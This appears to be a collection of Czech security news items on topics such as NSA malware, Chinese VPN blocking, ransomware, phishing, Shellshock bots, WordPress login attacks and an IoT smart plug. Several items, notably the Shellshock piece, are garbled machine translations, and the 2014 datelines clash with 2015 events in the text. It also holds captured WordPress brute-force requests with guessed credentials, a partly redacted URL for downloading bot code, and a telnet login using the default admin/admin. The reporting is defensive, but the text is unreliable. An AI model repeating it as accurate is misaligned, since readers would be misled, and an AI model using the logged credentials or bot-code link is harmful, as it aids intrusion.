NSA zřejmě kvůli získávání dat spolupracuje s tvůrci malwaru
28.1.2014 Hrozby
Značná část kódu keyloggeru, který byl použit americkou národní bezpečnostní agenturou NSA, je shodná s klíčovou komponentou sofistifikované platformy Regin, která se roky používala ke špehování firem, vládních institucí i jednotlivců. Keylogger (aplikace, která zaznamenává stisknuté klávesy na počítači uživatele a následně je zasílá útočníkovi) s označením QWERTY byl pravděpodobně součástí rozsáhlého systému používaného NSA a jejími partnerskými organizacemi a byl mezi informacemi, který Edward Snowden poskytl novinářům.
Keylogger zpřístupnil 17. ledna německý deník Der Spiegel spolu se souborem tajných dokumentů, které popisovaly možnosti NSA a jejích partnerských agentur z Velké Británie, Kanady, Austrálie a Nového Zélandu (tzv. Five Eyes Partners). „Získali jsme kopii škodlivého kódu publikovaného listem Der Spiegel a když jsme jej analyzovali, okamžitě nám připomněl Regin,“ uvedli včera na blogu výzkumníci ze společnosti Kaspersky Lab. „Když jsme se na kód podívali blíže, došli jsme k závěru, že keylogger QWERTY je identický s pluginem 50251 pro Regin.“
Výzkumníci Kaspersky následně zjistili, že QWERTY i 50251 jsou propojené se stejným modulem na platformě Regin kódově označované 50225. Tato komponenta umožňuje červu běžet v tzv. kernelu operačního systému, aniž by to uživatel tušil. Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »
Jak uvedl Kaspersky, jde o silný důkaz svědčící o tom, že QWERTY byl součástí platformy Regin. „Vezmeme-li v úvahu extrémní sofistifikovanost platformy Regin a velmi malou šanci, že by jej někdo mohl duplikovat, aniž by měl přístup k jeho zdrojovému kódu, došli jsme k závěru, že tvůrci QWERTY a Regin buďto spolupracují, nebo jde o týž osoby.“ Podle listu Der Spiegel je QWERTY plug-inem pro unifikovanou síť zvanou jako WARRIORPRIDE, kterou využívají partneři Five Eye. V dokumentu, který unikl z Communications Security Establishment Canada (kanadská obdoba NSA) je WARRIORPRIDE popisován jako flexibilní platforma určená pro průnik do počítačových systémů.
V dokumentu dále stojí, že WARRIORPRIDE je také uvnitř britské špionážní agentury GCHQ přezdíván jako DAREDEVIL a partneři v rámci Five Eyes k němu mohou libovolně vytvářet plug-in a přizpůsobovat si jej.
Z dostupných informací tak vyplývá, že platforma, kterou bezpečnostní společnosti označují jako Regin, je vlastně to, co NSA a spol. mají pojmenované jako WARRIORPRIDE. To už někteří jiní experti dříve předpokládali.
Podle Kaspersky Lab byl Regin červem, který infikoval v roce 2013 počítač belgického kryptografa Jeana Quisquatera, přičemž tento útok byl spojován s jiným útokem na belgickou telekomunikační skupinu Belgacom, mezi jejíž zákazníky patří Evropská komise, Evropský parlament a Evropská rada.
Čína začala intenzivně blokovat provoz přes VPN
26.1.2014 Incidenty
Zásadní vliv na kvalitu a bezpečnost připojení zahraničních uživatelů může mít nejnovější opatření Číny - několik zahraničních poskytovatelů VPN (virtual private network) totiž včera oznámilo, že přístup k jejich službám byl v Číně zakázán.
VPN fungují tak, že vytvoří jakýsi šifrovaný kanál mezi počítačem či smartphonem a serverem v zahraničí. Všechna komunikace je odesílaná v rámci tohoto kanálu, tudíž vládní agentury nemohou tak snadno sledovat pohyb uživatelů na internetu.
Například čínští uživatelé VPN používají k přístupu k zahraničním zpravodajským stránkám a zahraniční pracovníci v zemi je často použivají k lepšímu zabezpečení své komunikace.
Společnost StrongVPN, která spravuje síť serverů po celém světě, uvedla, že uživatelé v Číně v tomto týdnu začali zaznamenávat problémy s využíváním jejích služeb. Podle komentářů na blogu společnosti služby VPN v Číně fungují pouze občas.
Čínská vláda podle všeho využívá k zablokování VPN dvě techniky. První z nich zkoumá data v internetových paketech ve snaze zjistit, zda jde o VPN spojení. Druhá následně přeruší trafik určený pro internetové adresy používané VPN servery.
Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »
„Útok na nás a další poskytovatele VPN z tohoto týdne je mnohem sofistifikovanější, než tomu bylo v minulosti,“ uvedl Sunday Yokubaitis ze společnosti Golden Frog.
Problémy jsou podle listu Global Times zapříčiněny tím, že Čína utahuje svůj systém cenzury. Global Times citují nejmenovaného představitele tamní vlády, podle kterého by se Číňané měli na internetu chovat podle pravidel nastaveného systému cenzury „pokud jim záleží na jejich bezpečnosti“.
Čína má přes 600 milionů uživatelů internetu a všichni z nich jsou skryti za tzv. velkým firewallem, neboli systémem cenzury, který zakazuje na domácích webových stránkách určitá témata a filtruje vybrané zahraniční stránky.
Seznam zablokovaných stránek se neustále mění, ale zahrnuje známé portály jako BBC, Twitter, Facebook, Wordpress, Google Maps či Bing. Nedávno bylo zablokováno také připojení ke Gmailu.
Gartner varuje před sofistifikovanějšími kybernetickými útoky
23.1.2014 Hrozby
Podle Gartneru hackeři využívají čím dál lepší postupy, které jim umožňují oblestít i pokročilé bezpečnostní systémy.
Klienti Gartneru během uplynulých dvou měsíců upozornili na „značný nárůst“ snah o přihlášení se k jejich webovým službám za pomoci kradených přihlašovacích údajů, napsala na blog Gartneru analytička Avivah Litanová. Hackeři se snaží dostat do bankovních systémů, ke službám spravujícím virtuální měny (především bitcoiny) a „čemukoli dalšímu, co se dá zpeněžit“. Tento zájem hackerů není neobvyklý – útočníci však používají nové metody, díky kterým je obtížnější je odhalit.
Útoky, při kterých hackeři zkoušejí tisíce kradených přihlašovacích údajů z pouhých několika IP adres, jsou obvykle rychle zablokovány. Avšak nyní útočníci podle Gartneru zvolili jinou taktiku a útoky „rozmělnili“ na více počítačů. „U běžného útoku je jedna IP adresa nyní v průměru použita pouze v průměru 2,25x, než se útočníci přesunou k další IP adrese,“ uvedla Litanová.
Přihlašovací údaje jsou navíc útočníky testovány pouze jednou či dvakrát za hodinu v závislosti na službě, tudíž útoky trvají týdny či měsíce. Administrátoři pak mají větší problém tuto podvodnou aktivitu zachytit.
Jindy útočníci používají sítě spojené s populárními cloudovými službami, jejichž IP adresy nejsou považovány za nebezpečné a nebudou blokovány.
Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »
Hackeři, kteří mají o své oběti alespoň nějaké informace, se navíc snaží podvodně připojit k dané službě z přibližně stejného místa (či spíše země nebo regionu), v němž daná osoba žije a bezpečnostní systémy tak opět obelstit.
Přihlašovací údaje používané při útocích hackeři získávají na undergroundových burzách, kde je prodávají jiní útočníci, kteří se nabourali do systémů velkých firem. Litanová jako příklad uvedla ruský gang zvaný CyberVor, který shromáždil 1,2 miliardy přihlašovacích údajů a 500 milionů e-mailových adres z celé řady služeb.
Na CyberVor přišli odborníci ze společnosti Gold Security, která mimo jiné detekovala také masivní krádeže dat u společností Adobe či Target.
Jak uvádí Litanová, na trhu jsou samozřejmě bezpečnostní služby, které firmám umožní se i proti novým technikám útočníků bránit. Patří mezi ně cloudové systémy, které shromažďují metadata z IP adres a zařízení používaných legitimními uživateli pro transakce a umožňují třeba také speciálně upravit kód webové stránky firmy tak, aby bylo pro útočníky složitější najít v něm případnou díru.
Vyděračskému malwaru jen tak konec nebude
23.1.2014 Viry
Nový vyděračský malware CTB-Locker, který zašifruje data a poté požaduje po obětech výkupné, objevili analytici Esetu.
Škodlivý kód se šíří v Evropě a v latinské Americe. Podle Esetu jde o začátek kampaně, která může nabýt velkých rozměrů.
Infekce začíná tím, že oběť dostane e-mail (obvykle s předmětem „Fax“) s přílohou, která imituje faxovou zprávu. Příloha však obsahuje malware typu downloader – jde o malware Win32/TrojanDownloader.Elenoocka.A, což je klíčová komponenta masivních útoků na klienty bank, které od května 2014 probíhají i v České republice.
Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »
V případě, že oběť otevře domnělou faxovou zprávu, dojde k infikování trojanem Elenoocka, který se vzápětí pokusí stáhnout z ovládacích serverů šifrovací malware FileCoder.DA a spustit ho.
Pokud se mu to podaří, následuje obdobný scénář jako v případě obávaného CryptoLockeru. Malware zašifruje na napadeném počítači soubory, zamkne obrazovku a zobrazí na ní výzvu k zaplacení výkupného v bitcoinech – v přepočtu je to téměř 50 tisíc korun.
„CTB-Locker se od známějšího a rozšířenějšího CryptoLockeru liší především způsobem využití šifrovacího algoritmu. Jinak je to obdobná hrozba, a platí pro ni stejná pravidla pro prevenci: zálohovat data, aktualizovat software a chránit počítače,“ doporučuje Pablo Ramos z Esetu.
Sophos nabídne pokročilou ochranu koncových bodů
23.1.2014 Software
Nové verze svých bezpečnostních produktů představil Sophos. Novinkou v produktové řadě zaměřené na ochranu koncových bodů je komponenta Malicious Traffic Detection (MTD) odhalující komunikaci mezi koncovým bodem a servery útočníka.
Tento způsob ochrany je založen na technologiích, které společnost Sophos využívá ve svém firewallu nové generace. Komponenta MTD automaticky identifikuje problematický software a ukončí ho s cílem zabránit možnému poškození nebo ztrátě dat.
Sophos uvedl také aktualizovanou architekturu agenta pro koncový bod, kterou využívá nový System Protector. Tato služba funguje jako „mozek“. Sbírá a analyzuje informace získané bezpečnostními komponentami, kam vedle Malicious Traffic Detection patří například i runtime ochrana s technologií HIPS (systém pro prevenci průniku v hostitelských prostředích).
Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »
Díky tomuto komplexnímu pohledu na aktivity napříč komponentami může System Protector odhalit vzájemné souvislosti a využít je k identifikaci hrozeb, které osamocené bezpečnostní komponenty nechají bez povšimnutí.
Podniky tak získají lepší ochranu před stále běžnějšími pokročilými hrozbami i možnost snížení dopadů na produktivitu způsobených falešně pozitivními identifikacemi a varováními, které vyžadují manuální prověření.
Sophos nabízí také nové verze řešení SafeGuard Encryption a Mobile Encryption, které zvyšují schopnost firem bezpečně pracovat se šifrovanými daty, včetně vytváření, editace a přístupu, a to vše z libovolného zařízení.
Půjčujete občas mobil? Možná neděláte dobře
22.1.2014 Mobil
Téměř polovina Čechů (43 %)na zařízeních připojitelných k internetu, která půjčují rodině, přátelům či kolegům, nijak nechrání své soukromá data. Ještě horší je, že v tom nevidí žádné riziko.
22.1.2014
Ukázal to průzkum, který uveřejnily Kaspersky Lab a B2B International. Téměř dvě pětiny dotázaných v Česku své zařízení půjčují někomu dalšímu, 37 % dalšímu dospělému v domácnosti, 5 % dítěti a 3 % kolegovi nebo jinému známému.
Zvyšují tím přitom riziko ztráty nebo odcizení dat, zejména uložených přihlašovacích či soukromých údajů.
Zhruba 28 % těch, kteří uvedli, že svůj počítač, mobil či tablet sdílejí s jinými, nezavedli vůbec žádné zabezpečení, pouze 33 % respondentů v ČR zálohuje svá data před tím, než zařízení půjčí, 28 % je chrání heslem a jen 16 % si dává pozor na to, aby na nich žádné důležité informace neuchovávalo.
USA a Velká Británie spojí síly proti kybernetickým útokům
22.1.2014 Zabezpečení
Spojené státy americké a Velká Británie plánují užší spolupráci proti kybernetickým hrozbám. V rámci ní budou země mezi sebou provádět cvičné útoky, aby otestovaly své bezpečnostní technologie.
USA a Velká Británie na ochraně před kybernetickými útoky již nějaký čas spolupracují, nyní však tyto snahy zesílí. V rámci nových opatření bude přes Atlantik proudit více informací o možných kybernetických hrozbách a týmy expertů budou pracovat na co možná nejlepších způsobech zabezpečení vládních systémů před útoky hackerů. V rozhovoru pro BBC to uvedl britský premiér David Cameron.
Kybernetické útoky „jsou jednou z největších moderních hrozeb, které v současné době čelíme,“ uvedl Cameron, který je v současné době na návštěvě Washingtonu, aby celou věc blíže probral s prezidentem Barackem Obamou. Obě země v rámci nové strategie navýší počet "válečných her", v rámci kterých vzájemně testují svá zabezpečení.
„Tyto ´hry´ již nějakou dobu pořádme, nyní však jejich intenzita zesílí,“ řekl Cameron s tím, že britská tajná služba GCHQ a její americký ekvivalent NSA již nyní sdílejí celou řadu informací v oblasti kybernetického zabezpečení.
„Není to jen o ochraně společností, ale je to také o ochraně dat lidí, o ochraně peněz lidí. Tyto útoky mohou mít reálné dopady na životy milionů obyvatel,“ dodal Cameron s tím, že v zájmu lepší ochrany firem a občanů je potřeba, aby vládní agentury získaly více oprávnění. I o tom bude Cameron diskutovat s Obamou a zástupci velkých společností jako Google a Facebook.
Rozšíření spolupráce USA a Velké Británie v oblasti kybernetické bezpečnosti přichází krátce po útoku hackerů na Sony a nabourání se na účet na Twitteru americké vlády, k němuž se přihlásili stoupenci Islámského státu. Ti následně v příspěvku na Twitteru pohrozili rodinám amerických vojáků a přišli s tvrzením, že získali přístup k několika vojenským počítačům.
Po větším postihu teroristů online volají také ministři spravedlnosti členských zemí Evropské unie, kteří se sešli minulý týden v Paříži po útoku na francouzský list Charlie Hebdo. Ministři ve svém společném prohlášení uvedli, že pro zabránění teroristických útoků je nutná spolupráce s pokytovateli internetu.
Kritici však namítají, že ani užší spolupráce s poskytovateli by nemopohla zabránit útokům typu toho pařížského, jelikož francouzská tajná služba o existenci útočníků věděla, avšak ani tak nepodnikla žádné kroky.
Na Česko se valí další vlna phishingu, útočí na Českou spořitelnu
22.1.2014 Phishing
Do redakčního elektronické pošty nám dorazil podvržený e-mail z České spořitelny. Poměrně sofistikovaně se snaží z příjemců získat kompletní přihlašovací údaje do internetového bankovnictví České spořitelny.
"Vážený zákazníku, Chtěli bychom Vám zdůraznit, že přístup do Vašeho internetového bankovnictví již brzy vyprší. Aby bylo možné i nadále využívat on-line bankovnictví, žádáme Vás o potvrzení svých údajů pomocí odkazu níže."
Dopis je podepsán jakousi Klárou Pačesovou, agentkou zákaznického servisu. Zmíněný odkaz vede na adresu makemoneywithfelixoscar.com, kde je celkem zdatně vyvedena přihlašovací stránka Servisu 24, internetového bankovnictví České spořitelny samozřejmě v korporátním designu.
Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »
Průměrně inteligentní člověk si ale všimne, že oproti originální přihlašovací stránce je na té podvržené několik řádku navíc - jako tajný kód, tvrvalé bydliště nebo datum narození - viz prinscreen v naší galerii.
Samozřejmě, pokud vám takový e-mail (nám přišel z Česká spořitelna ) přijde, nikam se nepřihlašujte.
„S takovými útoky se potýkají všechny banky a ani my nejsme výjimkou. Vůči klientům jsme v této oblasti transparentní a v maximální možné míře veřejnost informujeme o výskytech podvodných jednání. Klienty jsme konkrétně před tímto typem již několikrát varovali a to jak na našem webu, tak v Servisu 24,“ komentuje Pavla Kozáková z tiskového centra České spořitelny.
NSA vytváří vlastní počítačové červy a využívá botnety
22.1.2014 Viry
NSA monitoruje tzv. botnety složené z tisíců či milionů infikovaných počítačů po celém světě a v případě potřeby může tato americká vládní agentura botnety s využitím technologie pojmenované jako Quantumbot infikovat pomocí svých vlastních červů. S informací přišel deník Der Spiegel.
Jeden z tajných dokumentů zveřejněných Edwardem Snowdenem a publikovaný deníkem Der Spiegel obsahuje podrobné informace o programu zvaném DEFIANTWARRIOR, v rámci kterého se odborníci NSA nabourávali do botnetů a používali je k cíleným útokům.
Jinými slovy, pokud byl (či stále je) počítač uživatele infikován nebezpečným červem hackery, vedle něj v určitých případech může svého červa umístit do systému také NSA a následně tento počítač využívat pro své vlastní útoky. Ty pak není možné vypátrat zpět k NSA.
Podle zveřejněných dokumentů je zmíněná operace prováděna pouze na neamerických počítačích. Boty, které jsou v USA, jsou nahlášeny FBI.
NSA také odposlouchává a sbírá data ukradená různými červy třetích stran, obzvláště těch, které do světa vypustily cizí špionážní agentury. Tuto praktiku NSA nazývá jako „sběr dat čtvrtou stranou“.
Jak uvedl Der Spiegel, například v roce 2009 NSA zachytila kybernetický útok Číňanů proti americkému ministerstvu obrany a její odborníci „byli schopni operaci infiltrovat“. NSA následně zjistila, že Číňané kradou data také z OSN, tudíž pokračovala v monitorování těchto útočníků a tedy i sběru dat z OSN.
V dalším případě, který tajný dokument popisuje jako „sběr dat pátou stranou“ pak zaměstnanec NSA inflitroval špionážní program Jižné Koreje zaměřený na Severní Koreu. Jinými slovy, NSA odposlouchávala zahraniční špionážní službu, která špehovala jinou zahraniční špionážní agenturu.
Dokumenty zveřejněné německým deníkem také přibližují možnosti NSA a špionážních agentur Velké Británie, Kanady, Austrálie a Nového Zélandu (označované jako Five Eyes Partners) při tvorbě a distribuci počítačových červů.
Jeden z dokumentů z Communications Security Establishment Canada (CSEC) popisuje unifikovanou platformu s označením WARRIORPRIDE, kterou používají členové Five Eyes Partners a lze ji rozšířit pomocí přídavků. Der Spiegel popsal například keylogger označovaný jako QWERTY, který se choval jako přídavek pro WARRIORPRIDE.
Podobných programů je v NSA řada. Například v rámci jiného programu s názvem PITIEDFOOL jeden z členů Five Eye Partners vyvinul červa, který umí nadálku v přednastavený čas tajně z pevného disku počítače ukrást data, smazat jej a přitom vypnout funkci Volume Shadow Copy (VSS), která je ve Windows využívána k obnově dat.
TrustPort představil antimalware pro rok 2015
22.1.2014 Software
Novou produktovou řadu 2015 pro domácí uživatele a firemní zákazníky vydal TrustPort. Obsahují vedle tradičních ochranných prvků i nástroj Optima, který umožňuje optimalizovat počítač uživatele.
Tato utilita čistí dočasné adresáře, registry a optimalizuje přístupy ke složkám. Jádro bezpečnostních produktů bylo také vylepšeno, přibyla pokročilejší verze jednoho ze skenovacích motorů. Uživatelé nových produktových verzí také uvítají intuitivní grafické rozhraní, které je podle výrobce nyní přehlednější.
Uživatelé si mohou zvolit stupeň ochrany dle svých nároků na zabezpečení počítače. Mohou si vybrat základní ochranu zvolením produktu TrustPort Antivirus, případně pokročilejší zabezpečení, které nabízí produkt TrustPort Internet Security, nebo komplexní ochranu počítače včetně přídavných funkcí pro mobilní platformy - produkt TrustPort Total Protection.
Aplikace TrustPort Mobile Security, určená pro mobilní zařízení, je založena na vlastním skenovacím motoru TrustPortu a nabízí nejen funkci skenování telefonu na vyžádání, ale i rezidentní ochranu proti malwaru. Pro platformy Android a iOS je zdarma.
Shellshock neustále dávat!
19.1.2014 Viry
Je to už 12 roků, protože SQL Slammer červ trápily interwebs .. když si vzpomenu na to, že byl také v lednu. Ale to nejde :). Dnes, o dvanáct let později, jsou překvapivě stále nakaženi Slammer bezpilotní letouny tam, a pokud používáte HoneyPot na UDP / 1434, slibuji, nebudete muset čekat celý tak dlouho, dokud se starověký kus historie malwaru je a- klepat.
Pravděpodobné, že Shellshock využije nebude mít stejnou výdrž, a to především proto, že útok Shellshock není soběstačný červivé v jednom paketu, ale obvykle tlačí dříve Shellshocked robotů, které skenovat do cíle. Ale to stále vypadá, jako Shellshock skenování a bot-tlačí nyní bude "šum na pozadí" v dohledné budoucnosti, protože tam je překvapující množství systémů tam, že i nadále zranitelné. Systémy, které naše senzory pak zvednout jako součást Shellbot armády. Vyšetřování jednoho z těchto botů v poslední době jsem zjistil, že to byla instalace Slackware od roku 2007 a zdálo se, že je snímač dálkového počasí, kompletní s webovou kamerou, která ukázala, že (bohužel, velmi zelená) sjezdovku níže. Podařilo se mi vypátrat majitele, hotel ve Švýcarsku, kteří byli "neví", že jejich meteorologická stanice "obsahoval počítač". Pokud naše protokoly DShield jsou nějaký náznak, existuje mnoho z těchto zařízení (a hotely, atd ..), tam venku.
Zde je to, co můžete udělat, aby pomohla. Shellshock roboty objeví nejčastěji v protokolech webového serveru, jako je například zde:
Adresa v červeném poli - 76.12.AB v tomto případě - je od místa, kde jsou skenovány. To neznamená, že původcem je zlo. S největší pravděpodobností je to jen další meteorologická stanice nebo fritéza, kde je vlastníkem "neví". Takže pokud jste je kontaktovat, je jemný, a chystal se vysvětlit hodně :)
Adresa v modrém poli - 91.142.CD v tomto případě - je od místa, kde se bot kód se vytáhl. To je nejvíce obyčejně hacknutý web server, nebo nenucený "free website hosting" účet. V tomto případě můžete najít hostingu přes "Whois", a využít jejich "Abuse" kontaktní adresy, aby věděli. Pokud zahrnete protokolu úryvek, jako je uvedeno výše, většina hosters reagovat a přijmout bot kód dolů.
Třetí věc, kterou můžete udělat, je stáhnout bot kód (opatrně :) do počítače, tím, že půjdete na http://91.142.CD/img.txt v tomto případě. Nejsem právník (takže se nemusíte mi věřit na to), ale od té doby aktivita je jasně škodlivý, a od té doby byl počítač pokyn pro skenování bot stáhnout tento kód, řekl bych, že tak činí na vlastní pěst, je v pořádku , Bot kód sám o sobě není příliš zajímavé, ale ty, které jsme dosud viděli jsou obvykle psaný v Perlu, a obsahují pevně IP adresy použité pro "Command & Control". Opět platí, že můžete určit hoster této C & C adresy přes whois, a dejte jim vědět.
Poslední dvě opatření i když opustí původní oběť infikované a zranitelný. Takže .. pokud budete mít čas a trpělivost, a vypadá to, že hostitel skenování se nachází v rezidenční nebo malý okruh obchodní adresou (myslíte, DSL), pak by to mohlo být užitečné, aby se pokusila kontaktovat původní oběť (76.12.AB nahoře) a poučit je o všech nečekaných věcí v životě, které "obsahují počítače" v těchto dnech.
Další Pozor: Je zřejmé, bot, který je skenování za přítomnosti Shellshock je s největší pravděpodobností náchylné k Shellshock samotné, a chybějící nepřeberné množství dalších náplastí. Ty by mohly být v pokušení "hrabat zpátky" na systému, a použijte Shellshock vedení na vlastní pěst zjistit, co je uvnitř. Pokud tak učiníte, i když je hacking, a nezákonné. Majitelé napadených systémů ani nevědí, jak se pirát ještě jednou o "výzkumníků", bez ohledu na to, jak údajně dobře míněné na "výzkumný pracovník" je. Pro hotelové meteorologické stanice, které uvádím výše, jsem pasivní kombinaci reverzní DNS, Google, archive.org, Netcraft a Whois zjistit, co to bylo, a na koho se obrátit.
Windows: zosobnění Check Bypass s CryptProtectMemory a CRYPTPROTECTMEMORY_SAME_LOGON vlajky
17.1.2014 Zabezpečení
Platforma: Windows 7, 8.1 aktualizace 32/64 bit
Třída: Bezpečnostní Bypass / Přístup k informacím
Funkce CryptProtectMemory umožňuje aplikaci šifrování paměti pro jeden ze tří scénářů, procesu, přihlašovací relace a počítačů. Při použití volby přihlašovací relace (CRYPTPROTECTMEMORY_SAME_LOGON vlajka), šifrovací klíč je generován na základě identifikátoru přihlašovací relace, je to pro sdílení paměti mezi procesy běžící v rámci stejného přihlášení. Vzhledem k tomu, může být také použit pro odesílání dat z jednoho procesu do druhého podporuje extrakci přihlašovací session id z zosobnění tokenu.
Problém je implementace v CNG.sys se při zachycení id přihlašovací relace (pomocí SeQueryAuthenticationIdToken) tak normální uživatel může zosobnit na úrovni identifikace a dešifrování nebo šifrování dat na dané relaci přihlášení nekontroluje úroveň zosobnění tokenu. To může být problém, pokud tam je služba, která je náchylná k pojmenovaného kanálu výsadby útoku nebo ukládání šifrovaných dat v čitelné sdílené části paměti světa.
Toto chování samozřejmě může být design, ale které nebyly stranou designu je to těžko říct. Dokumentace uvádí, že uživatel musí zosobnit klienta, který jsem četl v tom smyslu, že by měl být schopen jednat jménem klienta spíše než identifikovat jako klient.
Přiložený je jednoduchý PoC, který demonstruje problém. Pro reprodukci postupujte podle pokynů.
1) Spusťte Poc_CNGLogonSessionImpersonation.exe z příkazového řádku
2) Program by měl vytisknout "Encryption neodpovídá", což signalizuje, že dvě šifrování stejného dat nebyl zápas, z čehož vyplývá, klíč byl rozdíl mezi nimi.
Očekávaný výsledek:
Oba hovory by měl vrátit stejná data šifrovat, nebo druhé volání selže
Pozorovaná Výsledek:
Oba hovory uspět a vrátit se různé šifrované údaje
tcp / 6379 trolling - Redis NoSQL? Nebo něco jiného?
16.1.2015 Incidenty
DShield senzory hlásí uptick skenování pro TCP / 6379, v současné době většinou pocházející z 61.160.x a 61.240.144.x, které jsou jak ChinaNET / Unicom. tcp / 6379 je výchozí port databáze Redis NoSQL (http://redis.io) a REDIS standardně přijímá spojení z "každý". To je známá již nějakou dobu i když, a je také velmi výrazně uvedeno v dokumentaci REDIS (http://redis.io/topics/security):
REDIS je navržen tak, aby se přístup důvěryhodnými klienty uvnitř důvěryhodné prostředí. To znamená, že obvykle to není dobrý nápad, aby se odkryla instance REDIS přímo na internetu
což nás zajímalo, jestli je služba naskenovaný v tomto případě je opravdu REDIS, nebo něco jiného? Má někdo zachycení paketů příkazů, že skenery snaží vedle, když se zjistí, port otevřít? Pokud ano, podělte se prostřednictvím našeho kontaktního formuláře nebo komentáře níže.
Podivné wordpress přihlásit vzory
16.1.2015 Hrozby
Reader Robert přišel dnes velmi zajímavou situaci. Všiml si, že podivné wordpress přihlašovací vzory:
T 31.47.254.62:51020 -> XXXX: 80 [AP]
. POST /wp-login.php HTTP / 1.1
User-Agent: Mozilla / 5.0 (compatible; Googlebot / 2.1; + http: //www.google.com/ bot.html).
Host: ** redigovaného **
Karty:. * / *
Cookie: wordpress_test_cookie = WP + Cookie + zkontrolovat.
Content-Length:. 131
Content-Type: application/x-www-form-urlencoded.
.
log=admin&pwd=admin%21%21%21&wp-submit=Log+In&redirect_to=http://**redacted**/wp-admin/tes1a0&testcookie=1
----------------------------------
T 62.210.207.146:43322 -> XXXX: 80 [AP]
. POST /wp-login.php HTTP / 1.1
User-Agent: Mozilla / 5.0 (compatible; Googlebot / 2.1; + http: //www.google.com/ bot.html).
Host: ** redigovaného **
Karty:. * / *
Cookie: wordpress_test_cookie = WP + Cookie + zkontrolovat.
Content-Length:. 113
Content-Type: application/x-www-form-urlencoded.
.
log=ahenry&pwd=Ahenry%24%24%24&wp-submit=Log+In&redirect_to=http://**redacted**/wp-admin/tes1a0&testcookie=1
----------------------------------
T 109.199.82.5:46902 -> XXXX: 80 [AP]
. POST /wp-login.php HTTP / 1.1
User-Agent: Mozilla / 5.0 (compatible; Googlebot / 2.1; + http: //www.google.com/ bot.html).
Host: ** redigovaného **
Karty:. * / *
Cookie: wordpress_test_cookie = WP + Cookie + zkontrolovat.
Content-Length:. 110
Content-Type: application/x-www-form-urlencoded.
.
log=natemc&pwd=Johns666&wp-submit=Log+In&redirect_to=http://**redacted**/wp-admin/tes1a0&testcookie=1
Ve vzorku poslal k nám, tam jsou tři konkrétní zdroj IP adresa: 109.199.82.5, 62.210.207.146 a 31.47.254.62. Všechny tři IP adresy mají dobrou pověst (zkontrolovat na TrustedSource , SenderBase a SANS Internet Storm Center). Vypadá to, že klient se snaží dosáhnout skript s názvem tes1a0 a nastavení WordPress testu cookie, takže Wordpress může říct, klient přijímá soubory cookie a žádná chyba mikroorganismy povolené. Ověřil jsem si pro řetězec tes1a0 v Wordpress 4.1 instalace ke stažení, a to není součástí kódu. Je také jasné, to je satelitní bot falešný. Zkontrolujte předchozí deník Dr. Johannes Ullrich o tom, jak kontrolovat , když není google Google je .
Viděli jste tento druh WordPress pokusů? Pokud ano, dejte nám vědět přes Kontaktní formulář . Budu aktualizovat deník s shromážděných informací.
Jste Piratebay? thepiratebay.org Řešení na různých hostitelích
13.1.2015 Bezpečnost
Díky našemu čtenáři Davida za zaslání této detekovat (anonymizovány):
GET HTTP / 1.0
Host: a.tracker.thepriatebay.org
User-Agent: Bittorrent
Přijmout: * / *
Připojení: zavřeno
Webový server, David byl hit s dostatečným počtem žádostí, jako jedna nad způsobit odmítnutí služby. Žádosti pocházel z tisíců různých IP adres, všichni se zdají být umístěny v Číně. Rychlé vyhledávání Google ukázal, že on nebyl sám, ale další webové servery se objevily podobné útoky.
Vzhledem k tomu, hlavičku hostitele (a David zjistil různé "thepriatebay.org" jména hostitele), vypadá to, že některé DNS servery odpověděl s IP adresou Davidova, pokud dotazovaný pro "thepiratebay.org".
Udělal jsem rychlou kontrolu pasivních systémů DNS, a nenašel Davida IP. Ale když jsem dotazován čínské servery DNS pro název hostitele, obdržel jsem mnoho odpovědí. Každá odpověď byla jen opakuje párkrát, pokud vůbec. Tak nějak vypadal, jako by se všichni vrátili různých IP adres. Založené na US DNS servery na druhé straně obvykle nemají přeložit název hostitele, nebo reagují s 127.0.0.1, typické černé listiny technikou. Jen hrstka odpověděl s směrovat IP adresu.
Celkově lze říci, nejsem si jist, co se děje. Vypadá to, že "čínský firewall" problém pro mě. Ale pokud máte nějaké nápady či pakety, prosím dejte mi vědět.
Internet věcí: Vzpoura strojů
13.1.2015 Hrozby
Naše domy a kanceláře jsou stále více napadány elektronických zařízení s vloženým skutečný počítač s operačním systémem a skladování. Jsou připojeny k síťovým zdrojům pro vzdálenou správu, statistiky a dat dotazování. To se nazývá "internetu věcí" nebo "internetu věcí". Moje domácí síť je tvrzený a každý nový (neznámé), zařízení připojené k němu získá IP adresu z určitého rozsahu, který nemá připojení s ostatními hostiteli nebo na internetu, ale jsou přihlášeni jeho pakety. Cílem je odhalit podezřelé aktivity, jako úniku dat nebo neočekávané aktualizace firmwaru. Poslední hračku koupil jsem včera, je inteligentní Plug z Supra-Electronics. Toto zařízení umožňuje ovládat napájecího kabelu ze zásuvky prostřednictvím svého mobilního zařízení a vypočítat spotřebu energie s pěknou statistiky. Měl jsem velmi dobrou příležitost koupit za velmi nízkou cenu (25 €). Podívejme se, co je uvnitř .... Dokumentace zmiňuje postup nastavení a řízení prostřednictvím mobilního zařízení (s bezplatná aplikace pro iOS a Android), ale první reflex je skenování krabici. Zajímavé, webový server, stejně jako server, telnet čekají na paketů. Zkusme běžné přihlašovací údaje, jako admin / admin a ...
$ Telnet 192.168.254.225
snaží 192.168.254.225 ...
, má přímé spojení s 192.168.254.225
uniknout znak je '^]. "
(none) login: admin
Heslo:
BusyBox v1.12.1 (2014-07-31 06:32:52 SELČ ) zabudované ve skořápce (jasan)
Enter "pomoc" pro seznam vestavěných příkazů.
#
Ihned po spouštěcí sekvence, přístroj začal snažit komunikovat s vzdáleným počítačům: Mezi DNS dotazů a synchronizace NTP, velký provoz byl vytvořen na různých IP adresy přes protokol UDP / 10001. Stejný paket je odeslán do různých hostitelů. Užitečné zatížení byl blok 60 bajtů: Nebyl jsem schopen dekódovat obsah tohoto užitečného zatížení, prosím, vyjádřit, když člověk zjistí nějaké vzory. Zařízení také provádí pravidelnou kontrolu konektivity pomocí jediného ICMP ECHO paketu na www.google.com (každých 5 minut). Tento síťový provoz je generován procesu zvaném RDTServer:
# Ps
PID USER VSZ STAT COMMAND
1 admin 1400 S init
2 admin 0 SWN [ksoftirqd / 0]
3 admin 0 SW <[události / 0]
4 admin 0 SW <[khelper]
